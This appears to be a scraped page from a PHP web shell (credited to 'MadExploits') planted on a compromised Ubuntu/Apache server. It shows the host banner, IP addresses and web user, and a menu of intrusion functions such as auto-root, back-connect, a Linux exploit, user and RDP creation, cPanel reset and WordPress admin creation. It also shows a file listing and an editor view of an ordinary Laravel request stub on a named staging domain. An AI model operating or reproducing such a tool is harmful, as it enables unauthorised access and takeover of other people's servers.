Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.230.120
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
stagingcrm.oxopackaging.com /
stubs /
[ HOME SHELL ]
Name
Size
Permission
Action
export.model.stub
298
B
-rw-r--r--
export.plain.stub
245
B
-rw-r--r--
export.query-model.stub
289
B
-rw-r--r--
export.query.stub
234
B
-rw-r--r--
import.collection.stub
289
B
-rw-r--r--
import.model.stub
354
B
-rw-r--r--
request.stub
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : request.stub
<?php namespace {{ namespace }}; use Illuminate\Foundation\Http\FormRequest; use Illuminate\Contracts\Validation\Validator; use Illuminate\Validation\ValidationException; use Toastr; class {{ class }} extends FormRequest { /** * Determine if the user is authorized to make this request. * * @return bool */ public function authorize() { return true; } /** * Get the validation rules that apply to the request. * * @return array */ public function rules() { return [ // ]; } /** * Get the validation message that apply to the request. * * @return array */ public function messages() { return [ // ]; } protected function failedValidation(Validator $validator) { $messages = $validator->messages(); //dd($messages); if(!request()->wantsJson()){ foreach ($messages->all() as $message) { Toastr::error($message); } } throw (new ValidationException($validator)) ->errorBag($this->errorBag) ->redirectTo($this->getRedirectUrl()); } }
Close